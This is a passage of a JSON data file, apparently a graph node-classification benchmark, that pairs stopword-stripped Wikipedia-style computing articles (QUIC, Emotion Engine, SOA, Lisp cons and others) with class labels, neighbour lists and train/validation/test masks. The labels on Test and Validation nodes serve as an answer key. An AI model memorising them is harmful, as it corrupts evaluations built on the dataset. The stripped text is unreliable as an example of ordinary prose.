    "mask": "None"
  },
  {
    "node_id": 4095,
    "label": 5,
    "text": "QUIC:quic quic pronounced 'quick general-purpose transport layer network protocol initially designed jim roskind google implemented deployed 2012 announced publicly 2013 experimentation broadened described ietf still internet draft quic used half connections chrome web browser google servers web browsers support protocol although name initially proposed acronym quick udp internet connections ietf use word quic acronym simply name protocol among applications quic improves performance connection-oriented web applications currently using tcp establishing number multiplexed connections two endpoints user datagram protocol udp works hand-in-hand http/2 multiplexed connections allowing multiple streams data reach endpoints independently hence independent packet losses involving streams contrast http/2 hosted transmission control protocol tcp suffer head-of-line-blocking delays multiplexed streams tcp packets delayed lost quic secondary goals include reduced connection transport latency bandwidth estimation direction avoid congestion also moves congestion control algorithms user space endpoints rather kernel space claimed allow algorithms improve rapidly additionally protocol extended forward error correction fec improve performance errors expected seen next step protocol evolution june 2015 internet draft specification quic submitted ietf standardization quic working group established 2016 october 2018 ietf http quic working groups jointly decided call http mapping quic http/3 advance making worldwide standard transmission control protocol tcp aims provide interface sending streams data two endpoints data handed tcp system ensures data makes end exactly form connection indicate error condition exists tcp breaks data network packets adds small amounts data packet additional data includes sequence number used detect packets lost transmitted order checksum allows errors within packet data detected either problem occurs tcp uses automatic repeat request arq tell sender re-send lost damaged packet implementations tcp see error connection blocking operation stopping transfers error resolved connection considered failed single connection used send multiple streams data case http/2 protocol streams blocked although one might problem instance single error occurs downloading gif image used favicon entire rest page wait problem resolved tcp system designed look like data pipe stream deliberately contains little understanding data transmits data additional requirements like encryption using tls must set systems running top tcp using tcp communicate similar software end connection sorts setup tasks requires handshake process often requires several round-trips requests responses connection established due inherent latency long-distance communications add significant overhead overall transmission quic aims nearly equivalent tcp connection much-reduced latency primarily two changes rely understanding behaviour http traffic first change greatly reduce overhead connection setup http connections demand tls quic makes exchange setup keys supported protocols part initial handshake process client opens connection response packet includes data needed future packets use encryption eliminates need set tcp connection negotiate security protocol via additional packets protocols serviced way combining together multiple steps single request-response data used following requests initial setup well future requests would otherwise negotiated separate connections quic uses udp basis include loss recovery instead quic stream separately flow controlled lost data retransmitted level quic udp means error occurs one stream like favicon example protocol stack continue servicing streams independently useful improving performance error-prone links cases considerable additional data may received tcp notices packet missing broken data blocked even flushed error corrected quic data free processed single multiplexed stream repaired quic includes number mundane changes also improve overall latency throughput instance packets encrypted individually result encrypted data waiting partial packets generally possible tcp encryption records bytestream protocol stack unaware higher-layer boundaries within stream negotiated layers running top quic aims single handshake process another goal quic system improve performance network-switch events like happens user mobile device moves local wifi hotspot mobile network occurs tcp lengthy process starts every existing connection times one-by-one re-established demand solve problem quic includes connection identifier uniquely identifies connection server regardless source allows connection re-established simply sending packet always contains id original connection id still valid even user ip address changes quic implemented application-space opposed operating system kernel generally invokes additional overhead due context switches data moved applications however case quic protocol stack intended used single application application using quic connections hosted udp ultimately difference could small much overall http/2 stack already applications libraries commonly placing remaining parts libraries essentially error correction little effect http/2 stack size overall complexity organization allows future changes made easily require changes kernel updates one quic longer-term goals add new systems forward error correction fec improved congestion control one concern move tcp udp tcp widely adopted many middle-boxes internet infrastructure tuned tcp rate-limit even block udp google carried number exploratory experiments characterize found small number connections blocked manner led use rapid fallback-to-tcp system chromium network stack opens quic traditional tcp connection time allows fallback zero latency protocol created google taken ietf name quic already 2012 around quic version 20 quite different quic continued evolve refined within ietf original google quic designed general purpose protocol though initially deployed protocol support http chromium current evolution ietf protocol quic general purpose transport protocol chromium developers continued track evolution ietf quic standardization efforts adopt fully comply recent internet standards quic chromium quic code experimentally developed google chrome starting 2012 announced part chromium version 29 released august 20 2013 chrome currently enabled default chromium chrome browser experimental quic support enabled chrome //flags also browser extension indicate pages served quic similarly introduced opera 16 turned opera //flags/ enable-quic opera //flags/ enable-quic-https active sessions seen opera //net-internals/ quic firefox yet support quic 2019-07 cronet library quic protocols available android applications module loadable via google play services 2017 three actively maintained implementations google servers support quic google published prototype server go implementation called quic-go also available powers experimental quic support caddy server july 11 2017 litespeed technologies officially began supporting quic load balancer webadc litespeed web server products july 2019 55.9 quic websites used litespeed 43.7 used nginx although first google servers supported http-over-quic connections facebook also launched technology 2018 cloudflare offering quic support beta basis since 2018 july 2019 3.2 websites use quic addition several stale community projects libquic created extracting chromium implementation quic modifying minimize dependency requirements goquic provides go bindings libquic finally quic-reverse-proxy docker image acts reverse proxy server translating quic requests plain http understood origin server following implementations quic gquic available source form",
    "neighbors": [
      10242,
      1541,
      10271,
      9251,
      2085,
      3629,
      562,
      3133,
      5181,
      64,
      8265,
      4687,
      5724,
      609,
      10341,
      10344,
      649,
      9868,
      3218,
      9365,
      11413,
      7324,
      3742,
      9380,
      3237,
      9381,
      3751,
      3752,
      9387,
      10924,
      6318,
      9909,
      4797,
      2752,
      7364,
      8905,
      5843,
      9941,
      3813,
      8432,
      8956,
      9987,
      3847,
      4370,
      10005,
      5402,
      4893,
      7965,
      10016,
      5934,
      11566,
      5437,
      2887,
      6993,
      2904,
      5469,
      2910,
      5470,
      5471,
      5472,
      11112,
      7017,
      9580,
      367,
      10622,
      8584,
      7572,
      1435,
      5531,
      10659,
      5543,
      2994,
      2996,
      10171,
      3006,
      8648,
      2509,
      5078,
      1516,
      6651
    ],
    "mask": "Validation"
  },
  {
    "node_id": 4096,
    "label": 8,
    "text": "Urchin_(software):urchin software urchin web statistics analysis program developed urchin software corporation urchin analyzed web server log file content displayed traffic information website based upon log data sales urchin products ended march 28 2012 urchin software could run two different data collection modes log file analyzer hybrid log file analyzer urchin processed web server log files variety log file formats custom file formats could also defined hybrid urchin combined page tags log file data eradicate limitations data collection method isolation result accurate web visitor data urchin became one popular solutions website traffic analysis particularly isps web hosting providers largely due scalability performance pricing model urchin software corp. acquired google april 2005 forming google analytics april 2008 google released urchin 6 february 2009 google released urchin 6.5 integrating adwords urchin 7 released september 2010 included 64-bit support new ui event tracking among features",
    "neighbors": [
      4995,
      5892,
      7816,
      1033,
      5262,
      8719,
      5524,
      7700,
      10645,
      1943,
      8858,
      1435,
      10525,
      2978,
      4901,
      1959,
      3499,
      10284,
      6576,
      1203,
      5431,
      7359,
      196,
      3269,
      3782,
      11590,
      1096,
      4683,
      11343,
      3664,
      3795,
      1240,
      8413,
      6367,
      225,
      2658,
      6632,
      5483,
      236,
      9712,
      9970,
      8821,
      119,
      3836
    ],
    "mask": "Test"
  },
  {
    "node_id": 4097,
    "label": 9,
    "text": "Bernard_Greenberg:bernard greenberg bernard s. greenberg programmer computer scientist known work multics lisp machine 1978 greenberg implemented multics emacs using multics maclisp success effort influenced choice lisp basis later versions emacs greenberg involved design new error system symbolics turn influenced condition system adopted ansi common lisp working symbolics greenberg implemented lisp machine file system lmfs 1987 greenberg sonya keene authored rfc 1037 nfile file access protocol 1994 nycsubway.org released greenberg nxsys – design environment simulator control signals used new york city transit authority ’ signaling control networks current version nxsys microsoft windows application makes use opengl api provide interactive 3d view perspective new york city subway motorman according online documentation nxsys “ relay language ” subset lisp describes subway track systems control signal pathways subway simulation actually run lisp program compiled nxsys relay language source together thomas milo greenberg author basis technology arabic editor handles among others improved version dmg deutsche morgenländische gesellschaft transcription method supports reversible transcription semi-reversible transliteration arabic text",
    "neighbors": [
      6502,
      11495,
      205,
      2062,
      6797,
      5361,
      9299,
      6772,
      2166,
      10104
    ],
    "mask": "None"
  },
  {
    "node_id": 4098,
    "label": 3,
    "text": "Emotion_Engine:emotion engine emotion engine central processing unit developed manufactured sony computer entertainment toshiba use playstation 2 video game console also used early playstation 3 models sold japan north america model numbers cechaxx cechbxx provide playstation 2 game support mass production emotion engine began 1999 ended late 2012 discontinuation playstation 2 emotion engine consists eight separate units performing specific task integrated onto die units cpu core two vector processing units vpu 10-channel dma unit memory controller image processing unit ipu three interfaces input output interface i/o processor graphics interface gif graphics synthesizer memory interface system memory cpu core tightly coupled first vpu vpu together responsible executing game code high-level modeling computations second vpu vpu dedicated geometry-transformations lighting operates independently parallel cpu core controlled microcode vpu utilized also used geometry-transformations display lists generated cpu/vpu0 vpu1 sent gif prioritizes dispatching graphics synthesizer rendering cpu core two-way superscalar in-order risc processor based mips r5900 implements mips-iii instruction set architecture isa much mips-iv addition custom instruction set developed sony operated 128-bit wide groups either 32-bit 16-bit 8-bit integers single instruction multiple data simd fashion i.e four 32-bit integers could added four others using single instruction instructions defined include add subtract multiply divide min/max shift logical leading-zero count 128-bit load/store 256-bit 128-bit funnel shift addition described sony competitive reasons contrary misconceptions simd capabilities amount processor 128-bit neither memory addresses integers 128-bit shared simd/integer registers comparison 128-bit wide registers simd instructions present 32-bit x86 architecture since 1999 introduction sse however internal data paths 128bit wide processors capable operating 4x32bit quantities parallel single registers processor mips-based modified instruction set main vu0 core superscalar in-order 2-issue design 6 stage long integer pipelines 15 stage long floating point pipeline assortment registers consists 32 128 bit vliw simd registers naming/renaming one 64 bit accumulator two 64 bit general data registers 8 16 bit fix function registers 16 8 bit controller registers processor also two 64 bit integer alus 128bit load-store unit lsu branch execution unit bxu 32 bit vu1 fpu coprocessor acted sync controller vpu0/vpu1 containing mips base processor core 32 64-bit fp registers 15 32-bit integer registers alus 64-bit 32-bit fpu n't ieee 754 compliant custom instruction set 107 mmi multimedia extensions implemented grouping two 64-bit integer alus integer floating-point pipelines six stages long feed execution units instructions data 16 kb two-way set associative instruction cache 8 kb two-way set associative non blocking data cache 16 kb scratchpad ram instruction data caches virtually indexed physically tagged scratchpad ram exists separate memory space combined 48 double entry instruction data translation lookaside buffer provided translating virtual addresses branch prediction achieved 64-entry branch target address cache branch history table integrated instruction cache branch mispredict penalty three cycles due short six stage pipeline majority emotion engine floating point performance provided two vector processing units vpu designated vpu0 vpu1 essentially dsps tailored 3d math forerunner hardware vertex shader pipelines vpu features 32 128-bit vector simd registers holding 4d vector data 16 16-bit fixed-point registers four fmac floating point multiply-accumulate units fdiv floating point divide unit local data memory data memory vpu0 4 kb size vpu1 features 16 kb data memory achieve high bandwidth vpu data memory connected directly gif data memories read directly dma unit single vector instruction consists four 32-bit single-precision floating-point values distributed four single-precision 32-bit fmac units processing scheme similar ssex extensions intel fmac units take four cycles execute one instruction units six-stage pipeline throughput one instruction per cycle fdiv unit nine-stage pipeline execute one instruction every seven cycles ipu allowed mpeg-2 compressed image decoding allowing playback dvds game fmv also allowed vector quantization 2d graphics data memory management unit rdram controller dma controller handle memory access within system communications mips core two vpus gif memory controller units handled 128-bit wide internal data bus running half clock frequency emotion engine offer greater bandwidth also 128-bit dedicated path cpu vpu0 128-bit dedicated path vpu1 gif 150 mhz internal data bus provides maximum theoretical bandwidth 2.4 gb/s communication emotion engine ram occurs two channels drdram direct rambus dynamic random access memory memory controller interfaces internal data bus channel 16 bits wide operates 400 mhz ddr double data rate combined two channels drdram maximum theoretical bandwidth 25.6 gbit/s 3.2 gb/s 33 bandwidth internal data bus memory controller buffers data sent drdram channels extra bandwidth utilised cpu emotion engine interfaces directly graphics synthesizer via gif dedicated 64-bit 150 mhz bus maximum theoretical bandwidth 1.2 gb/s provide communications emotion engine input output processor iop input output interface interfaces 32-bit wide 37.5 mhz input output bus maximum theoretical bandwidth 150 mb/s internal data bus interface provides enough bandwidth pcmcia extension connector used network adapter built-in p-ata interface faster data access online functionality advantage high bandwidth could easily used introduce hardware extensions like network adapter built-in ide hdd support extensions extend functionality product lifecycle seen competitive advantage newer variants like slim edition interface would however offer vastly bandwidth required playstation input output devices hdd support removed pcmcia connector design abandoned favor slimmer design emotion engine contained 13.5 million transistors die measuring 240 mm fabricated sony toshiba 0.25 µm 0.18 µm effective l complementary metal–oxide–semiconductor cmos process four levels interconnect emotion engine packaged 540-contact plastic ball grid array pbga primary use emotion engine serve playstation 2 cpu first skus playstation 3 also featured emotion engine motherboard achieve backwards compatibility playstation 2 games however second revision playstation 3 lacked physical emotion engine order lower costs performing functions using software emulation performed cell broadband processor coupled hardware graphics synthesizer still present achieve playstation 2 backwards compatibility subsequent revisions graphics synthesizer removed however playstation 2 software emulator available later system software revisions use sony ps2 classics titles available purchase sony entertainment network",
    "neighbors": [
      9091,
      3077,
      7173,
      8327,
      8711,
      6926,
      783,
      528,
      6799,
      7445,
      9851,
      4124,
      6815,
      8481,
      10658,
      4516,
      5028,
      9126,
      9512,
      6057,
      426,
      938,
      8237,
      9911,
      8126,
      7234,
      1480,
      8523,
      10316,
      4060,
      1501,
      6247,
      8937,
      6250,
      6252,
      6253,
      5358,
      10734,
      1776,
      3824,
      6256,
      499,
      5237,
      760,
      3451,
      6268
    ],
    "mask": "Validation"
  },
  {
    "node_id": 4099,
    "label": 4,
    "text": "Air_Force_Cyber_Command_(Provisional):air force cyber command provisional air force cyber command provisional afcyber p proposed united states air force major command existed provisional status 6 october 2008 air force announced command would brought permanent activation cyber mission would transferred standup twenty-fourth air force air force space command development afcyber announced secretary air force 2 november 2006 originally designated stand around summer 2007 pushed back late 2008 afcyber planned draw upon personnel resources 67th network warfare wing well resources eighth air force planned placed command major general william t. lord former secretary air force michael wynne summarized mission afcyber aim develop major command stands alongside air force space command air combat command provider forces president combatant commanders american people rely preserving freedom access commerce air space cyberspace 14 august 2008 air force made statement pause standing afcyber command set 1 october 2008 air force remains committed providing full-spectrum cyber capabilities include global command control electronic warfare network defense secretary chief staff air force considered delaying currently planned actions air force cyber command allow ample time comprehensive assessment afcyber requirements synchronize afcyber mission key air force initiatives new air force leaders continue make fresh assessment efforts provide nation joint force full spectrum air space cyberspace capabilities 8 october 2008 air force followed previous findings decided place afcyber numbered air force within air force space command wednesday 19 august 2009 24th air force stood following environmental impact analysis required law final list air force bases competition host cyber command headquarters listed alphabetically state 14 may 2009 air force announced lackland afb san antonio texas selected headquarters 24th air force air force downgraded version provisional cyber command however also reported continued separate armed services cyber operations exist cloud uncertainty ... light recent reports secretary defense robert gates considering creation multi-service cyber command based fort meade md tbd united states cyber command",
    "neighbors": [
      5002,
      4435
    ],
    "mask": "None"
  },
  {
    "node_id": 4100,
    "label": 4,
    "text": "DriveSentry:drivesentry drivesentry antivirus program developed drivesentry inc protect microsoft windows users malware available free personal non commercial use though restricted functionality drivesentry provides realtime demand virus scanner uses following methods determine application contains virus allowing run drivesentry partners offensive computing frame4 security services collect analyze malware samples database list partnering way ensures database fed multiple sources therefore offers redundancy although drivesentry basic features available free advanced features automatically updating white blacklists paid via one-off payment articles computing publications discussing new malware protection technologies – whitelisting – claim traditional antivirus technologies increasingly hard time keeping latest virus trojans malicious threats popularity internet ease data spread allows threats propagate faster requiring traditional antivirus products play catch-up new zero day threats techniques using white/blacklisting community feedback may offer greater security however functionality come cost – specifically whitelisting allows pre-vetted software executed prevents software running even harmless drivesentry avoids issue allowing user prompted programs n't appear black whitelist forces responsibility end user determine good bad drivesentry attempts help user monitoring action program calculating displaying threat rating furthermore malicious software included whitelist still executed",
    "neighbors": [
      8640,
      9281,
      2050,
      7139,
      10756,
      2213,
      10631,
      4746,
      8283,
      8331,
      6797,
      7983,
      5749,
      3382,
      7515,
      5407
    ],
    "mask": "None"
  },
  {
    "node_id": 4101,
    "label": 9,
    "text": "Cons:cons computer programming fundamental function dialects lisp programming language cons 'tructs memory objects hold two values pointers values objects referred cons cells conses non-atomic s-expressions natses cons pairs lisp jargon expression cons x onto means construct new object codice_1 resulting pair left half referred first element content address register right half second element content decrement register referred loosely related object-oriented notion constructor creates new object given arguments closely related constructor function algebraic data type system word cons expressions like cons onto also part general functional programming jargon sometimes operators similar purpose especially context list processing pronounced cons good example operator ml scala f elm operator haskell adds element beginning list although cons cells used hold ordered pairs data commonly used construct complex compound data structures notably lists binary trees example lisp expression constructs cell holding 1 left half so-called field 2 right half field lisp notation value looks like note dot 1 2 indicates s-expression dotted pair so-called cons pair rather list lisp lists implemented top cons pairs specifically list structure lisp either forms basis simple singly linked list structure whose contents manipulated note list also cons pair example consider list whose elements 1 2 3 list created three steps equivalent single expression shorthand resulting value list i.e generally abbreviated thus used add one element front existing linked list example x list defined produce list another useful list procedure concatenates two existing lists i.e combines two lists single list binary trees store data leaves also easily constructed example code results tree i.e technically list 1 2 3 previous example also binary tree one happens particularly unbalanced see simply rearrange diagram following equivalent cons refer general process memory allocation opposed using destructive operations kind would used imperative programming language example sped code bit putting side effects instead cons ridiculously since lisp first-class functions data structures including cons cells implemented using functions example scheme technique known church encoding re-implements cons car cdr operations using function cons cell church encoding usual way defining data structures pure lambda calculus abstract theoretical model computation closely related scheme implementation academically interesting impractical renders cons cells indistinguishable scheme procedure well introducing unnecessary computational inefficiencies however kind encoding used complex algebraic data types variants may even turn efficient kinds encoding encoding also advantage implementable statically typed language n't variants java using interfaces instead lambdas",
    "neighbors": [
      3212,
      2062,
      5521,
      5783,
      11674,
      10012,
      10145,
      3876,
      5796,
      3370,
      5677,
      8251,
      2557,
      6087,
      10571,
      7894,
      10584,
      6239,
      10083,
      228,
      7805,
      6502,
      8293,
      5352,
      5997,
      5361,
      8435,
      3702,
      3705,
      2556,
      5885
    ],
    "mask": "None"
  },
  {
    "node_id": 4102,
    "label": 3,
    "text": "Pentagram_(video_game):pentagram video game pentagram zx spectrum msx video game released ultimate play game 1986 fourth sabreman series following adventures sabre wulf underwurlde knight lore similarly knight lore uses isometric filmation engine game written either tim chris stamper u.s. gold programming team see main article reason confusion typically ultimate release inlay card provides little actual instruction playing game includes cryptic short story introduction ultimate way describing object game recover lost pentagram artifact magical power firstly sabreman must locate one wells located maze screens shoot several times spell take resultant bucket water one broken obelisks dropped water heal stone must done four obelisks make titular pentagram appear one rooms done five magic runestones must found placed pentagram though objective pentagram complex obscure simple find fetch gameplay two previous filmation games knight lore alien 8 gameplay similar two titles main differences final revision filmation engine new ability shoot enemies projectile magic spell ability enemies respawn directional control system previous games also removed spectrum single joystick button needed fire sabreman spell could longer used jump instead joystick used jump basic gameplay sabreman previous outing knight lore without game day/night shapeshifting cycle wanders mazelike system screens filled enemies pieces movable scenery often forming obstacles puzzles exits one walls sometimes high difficult reach pentagram features larger numbers enemies either knight lore alien 8 due sabreman newfound ability kill include new flying creatures ghosts lice n't kill sabreman get way idea reprised sabreman second adventure underwurlde may even jumped onto harmless frequently annoying foes gravitate toward sabreman hover around disrupting movement sometimes even nudging platforms destroyed others witches zombies lethal touch may destroyed head straight sabreman wander straight lines meeting obstruction point change direction behaviour true wood spiders though dangerous killed wulfsheads either static move set pattern also killed enemy destroyed use sabreman new magic fireball spell another drop top screen replace short happening much faster game player progresses maximum two enemies per screen one time excluding indestructible ones already place room entered due limitations hardware previous filmation games slows crawl four moving objects screen previous two filmation games enemies may interact scenery basic way shoving movable objects logs tables along bump sabreman may also push one objects though pentagram may even move distance blast magic terms gameplay features pentagram advanced filmation titles sections gaming press becoming tired concept accused ultimate unoriginality ultimate third filmation title fifth filmation ii games nightshade gunfright counted time publishers also releasing isometric filmation-inspired games confusion also factor sinclair lamenting pentagram nowiki /nowiki instructions shrouded ultimate rather confusing 'poetry sinclair user admitted could work objective something various wishing wells dotted game even crash rated pentagram highly n't quite worked game objective time review review scores ranged 3/5 awarded sinclair user described lazy criticised perceived lack imagination setting design 93 crash smash awarded ever ultimate-friendly crash magazine cited graphics re-spawning enemies atmosphere high points",
    "neighbors": [
      320,
      9254,
      9191,
      2792,
      9006,
      10931,
      4278,
      5820,
      2173
    ],
    "mask": "Train"
  },
  {
    "node_id": 4103,
    "label": 8,
    "text": "Frosmo:frosmo frosmo software service company founded 2008 company holds headquarters helsinki finland additional offices also poland united kingdom singapore spain sweden company actively develops offers javascript-based conversion rate optimization solution bypass limitations current cms ecommerce platforms founded mobile gaming company dodreams earlier mikael gummerus learned gap gaming market intelligent personalization software late 2008 frosmo launched gaming platform could analyze gamers ’ behavior personalize service accordingly roughly half year later frosmo secured angel round highly distinguished investors individuals risto siilasmaa actual size investment round n't disclosed speculated relatively large although gaming platform peaked 750,000 monthly active users company quickly realized technology could well implemented outside industry 2010 frosmo developed launched social optimizer first product aimed website personalization one first tools make use facebook like button plug-in released april year plug-in acts gateway detailed visitor data venturebeat explains data collection analyzing capabilities company software got positive feedback ui deemed poor design example part solution called social optimizer tool responsible displaying personalized messages used pop-ups ugly click 2014 company estimated gained deals worth 1 million euros world travel market travel tech trade show alone",
    "neighbors": [
      3462
    ],
    "mask": "None"
  },
  {
    "node_id": 4104,
    "label": 5,
    "text": "SquidNT:squidnt squidnt port squid proxy server microsoft windows nt-based operating systems squidnt effort since merged main squid project september 2006 maintained guido serassio one core developers squid name squidnt still often used referring squid running windows official name official name squid regardless platform compile source code minimalist gnu windows microsoft visual studio windows support still largely missing squid windows may installed run command line may also installed windows service graphical user interface squid windows run following windows operating systems",
    "neighbors": [
      6797,
      7983,
      8976,
      4725,
      2045
    ],
    "mask": "None"
  },
  {
    "node_id": 4105,
    "label": 4,
    "text": "Markovian_discrimination:markovian discrimination markovian discrimination spam filtering method used crm114 spam filters model statistical behaviors spam nonspam accurately simple bayesian methods simple bayesian model written text contains dictionary legal words relative probabilities markovian model adds relative transition probabilities given one word predict next word based theory markov chains andrey markov hence name essence bayesian filter works single words alone markovian filter works phrases entire sentences two types markov models visible markov model hidden markov model hmm difference visible markov model current word considered contain entire state language model hidden markov model hides state presumes current word probabilistically related actual internal state language example visible markov model word predict accuracy following word hidden markov model entire prior text implies actual state predicts following words actually guarantee state prediction since latter case encountered spam filtering hidden markov models almost always used particular storage limitations specific type hidden markov model called markov random field particularly applicable usually clique size four six tokens",
    "neighbors": [
      8747,
      1771,
      9053
    ],
    "mask": "Test"
  },
  {
    "node_id": 4106,
    "label": 1,
    "text": "FrontBase:frontbase frontbase relational database management system written ansi c. frontbase uses unicode character encoding frontbase complies sql 92 fully compliant unicode unicode 2.0 tcp/ip uses sockets frontbase available following platforms drivers adaptors include apple webobjects php3 php4 perl odbc jdbc omnis studio realbasic tcl eof fbaccess fbcaccess data types supported include integer decimal timestamp blob varchar",
    "neighbors": [
      6465,
      6797,
      8781,
      7983,
      10286,
      5492,
      10389,
      823,
      9177
    ],
    "mask": "Test"
  },
  {
    "node_id": 4107,
    "label": 8,
    "text": "Service-oriented_architecture:service-oriented architecture service-oriented architecture soa style software design services provided components application components communication protocol network basic principles service-oriented architecture independent vendors products technologies service discrete unit functionality accessed remotely acted upon updated independently retrieving credit card statement online service four properties according one many definitions soa different services used conjunction provide functionality large software application principle soa shares modular programming service-oriented architecture integrates distributed separately-maintained -deployed software components enabled technologies standards facilitate components communication cooperation network especially ip network soa services use protocols describe pass parse messages using description metadata metadata describes functional characteristics service quality-of-service characteristics service-oriented architecture aims allow users combine large chunks functionality form applications built purely existing services combining ad hoc manner service presents simple interface requester abstracts away underlying complexity acting black box users also access independent services without knowledge internal implementation related buzzword service-orientation promotes loose coupling services soa separates functions distinct units services developers make accessible network order allow users combine reuse production applications services corresponding consumers communicate passing data well-defined shared format coordinating activity two services manifesto published service-oriented architecture october 2009 came six core values listed follows soa seen part continuum ranges older concept distributed computing modular programming soa current practices mashups saas cloud computing see offspring soa industry standards relating exact composition service-oriented architecture although many industry sources published principles include following soa building block play three roles service consumer–provider relationship governed standardized service contract business part functional part technical part service composition patterns two broad high-level architectural styles choreography orchestration lower level enterprise integration patterns bound particular architectural style continue relevant eligible soa design service-oriented architecture implemented web services done make functional building-blocks accessible standard internet protocols independent platforms programming languages services represent either new applications wrappers around existing legacy systems make network-enabled implementers commonly build soas using web services standards one example soap gained broad industry acceptance recommendation version 1.2 w3c world wide web consortium 2003 standards also referred web service specifications also provide greater interoperability protection lock-in proprietary vendor software one however also implement soa using service-based technology jini corba rest architectures operate independently specific technologies therefore implemented using wide range technologies including implementations use one protocols example might use file-system mechanism communicate data following defined interface specification processes conforming soa concept key independent services defined interfaces called perform tasks standard way without service foreknowledge calling application without application needing knowledge service actually performs tasks soa enables development applications built combining loosely coupled interoperable services services inter-operate based formal definition contract e.g. wsdl independent underlying platform programming language interface definition hides implementation language-specific service soa-based systems therefore function independently development technologies platforms java .net etc. services written c running .net platforms services written java running java ee platforms example consumed common composite application client applications running either platform also consume services running web services facilitate reuse managed environments also wrap cobol legacy systems present software services high-level programming languages bpel specifications ws-cdl ws-coordination extend service concept providing method defining supporting orchestration fine-grained services coarse-grained business services architects turn incorporate workflows business processes implemented composite applications portals service-oriented modeling soa framework identifies various disciplines guide soa practitioners conceptualize analyze design architect service-oriented assets service-oriented modeling framework somf offers modeling language work structure map depicting various components contribute successful service-oriented modeling approach illustrates major elements identify aspects service development scheme model enables practitioners craft project plan identify milestones service-oriented initiative somf also provides common modeling notation address alignment business organizations enterprise architects believe soa help businesses respond quickly cost-effectively changing market conditions style architecture promotes reuse macro service level rather micro classes level also simplify interconnection to—and usage of—existing legacy assets soa idea organization look problem holistically business overall control theoretically would mass developers using whatever tool sets might please rather would coding standard set within business also develop enterprise-wide soa encapsulates business-oriented infrastructure soa also illustrated highway system providing efficiency car drivers point everyone car highway anywhere things would limited disorganized attempt get anywhere quickly efficiently ibm vice president web services michael liebow says soa builds highways respects soa could regarded architectural evolution rather revolution captures many best practices previous software architectures communications systems example little development solutions use truly static bindings talk equipment network taken place embracing soa approach systems position stress importance well-defined highly inter-operable interfaces predecessors soa include component-based software engineering object-oriented analysis design ooad remote objects instance corba service comprises stand-alone unit functionality available via formally defined interface services kind nano-enterprises easy produce improve also services mega-corporations constructed coordinated work subordinate services mature rollout soa effectively defines api organization reasons treating implementation services separate projects larger projects include soa promises simplify testing indirectly services autonomous stateless fully documented interfaces separate cross-cutting concerns implementation organization possesses appropriately defined test data corresponding stub built reacts test data service built full set regression tests scripts data responses also captured service service tested 'black box using existing stubs corresponding services calls test environments constructed primitive out-of-scope services stubs remainder mesh test deployments full services interface fully documented full set regression test documentation becomes simple identify problems test services testing evolves merely validate test service operates according documentation finds gaps documentation test cases services within environment managing data state idempotent services complexity examples may prove useful aid documenting service level becomes useful documentation apis within java community process provide good examples exhaustive staff would typically use important subsets 'ossjsa.pdf file within jsr-89 exemplifies file soa conflated web services however web services one option implement patterns comprise soa style absence native binary forms remote procedure call rpc applications could run slowly require processing power increasing costs implementations incur overheads soa implemented using technologies example java business integration jbi windows communication foundation wcf data distribution service dds depend remote procedure calls translation xml time emerging open-source xml parsing technologies vtd-xml various xml-compatible binary formats promise significantly improve soa performance services implemented using json instead xml suffer performance concern stateful services require consumer provider share consumer-specific context either included referenced messages exchanged provider consumer constraint drawback could reduce overall scalability service provider service-provider needs retain shared context consumer also increases coupling service provider consumer makes switching service providers difficult ultimately critics feel soa services still constrained applications represent primary challenge faced service-oriented architecture managing metadata environments based soa include many services communicate among perform tasks due fact design may involve multiple services working conjunction application may generate millions messages services may belong different organizations even competing firms creating huge trust issue thus soa governance comes scheme things another major problem faced soa lack uniform testing framework tools provide required features testing services service-oriented architecture major causes difficulty see drops.dagstuhl.de additional challenges partial solutions research roadmap input regarding software service engineering tim o'reilly coined term web 2.0 describe perceived quickly growing set web-based applications topic experienced extensive coverage involves relationship web 2.0 service-oriented architectures soa philosophy encapsulating application logic services uniformly defined interface making publicly available via discovery mechanisms notion complexity-hiding reuse also concept loosely coupling services inspired researchers elaborate similarities two philosophies soa web 2.0 respective applications argue web 2.0 soa significantly different elements thus regarded parallel philosophies whereas others consider two concepts complementary regard web 2.0 global soa philosophies web 2.0 soa serve different user needs thus expose differences respect design also technologies used real-world applications however use-cases demonstrated potential combining technologies principles web 2.0 soa microservices modern interpretation service-oriented architectures used build distributed software systems services microservice architecture processes communicate network order fulfill goal services use technology agnostic protocols aid encapsulating choice language frameworks making choice concern internal service microservices new realisation implementation approach soa become popular since 2014 introduction devops also emphasize continuous deployment agile practices single commonly agreed definition microservices following characteristics principles found literature",
    "neighbors": [
      9734,
      7175,
      9225,
      4107,
      8203,
      530,
      11303,
      8751,
      7216,
      3121,
      6193,
      5700,
      7753,
      11339,
      9301,
      9305,
      5210,
      7775,
      4194,
      4199,
      9330,
      1657,
      7802,
      3196,
      9345,
      5767,
      5768,
      4233,
      9351,
      5772,
      8342,
      5789,
      158,
      7846,
      3753,
      2221,
      2222,
      2733,
      4788,
      5812,
      10938,
      9403,
      11457,
      6338,
      7878,
      211,
      8406,
      1756,
      7389,
      1250,
      10471,
      8425,
      2283,
      9455,
      10486,
      7930,
      7935,
      8967,
      4873,
      11541,
      10020,
      2854,
      6454,
      10553,
      4412,
      4423,
      9031,
      333,
      10061,
      337,
      6483,
      862,
      11117,
      4979,
      10102,
      10617,
      9083,
      4483,
      2441,
      1935,
      11156,
      5525,
      3990,
      8597,
      6555,
      11675,
      9629,
      8096,
      5029,
      8626,
      6585,
      7615,
      9665,
      2501,
      3529,
      8149,
      2011,
      479,
      3558,
      3560,
      3562,
      11242,
      5614,
      4591,
      7664,
      1521,
      4593,
      9710,
      10236,
      511
    ],
    "mask": "None"
  },
  {
    "node_id": 4108,
    "label": 3,
    "text": "Whiskey_Lake_(microarchitecture):whiskey lake microarchitecture whiskey lake intel codename third 14 nm skylake process-refinement following kaby lake refresh coffee lake intel announced low power mobile whiskey lake cpus availability august 28 2018 yet advertised whether cpu architecture contains hardware mitigations meltdown/spectre class vulnerabilities—various sources contain conflicting information unofficially announced whiskey lake hardware mitigations meltdown l1tf spectre v2 requires software mitigations well microcode/firmware update tdp cpus 15 w configurable core i5-8365u i7-8665u support intel vpro technology pentium gold celeron cpus lack avx2 support",
    "neighbors": [
      3459,
      5380,
      3973,
      8325,
      9095,
      5386,
      9611,
      9741,
      5649,
      7313,
      5523,
      6804,
      8851,
      4886,
      9111,
      3352,
      9500,
      5883,
      2088,
      10669,
      9391,
      10675,
      4276,
      1461,
      10548,
      2237,
      5309,
      8125,
      8126,
      833,
      6339,
      5444,
      9541,
      1998,
      2638,
      977,
      2514,
      5073,
      2516,
      5844,
      9435,
      7134,
      1119,
      1000,
      7657,
      4204,
      5356,
      8684,
      5871,
      9582,
      10734,
      499,
      8820,
      3317,
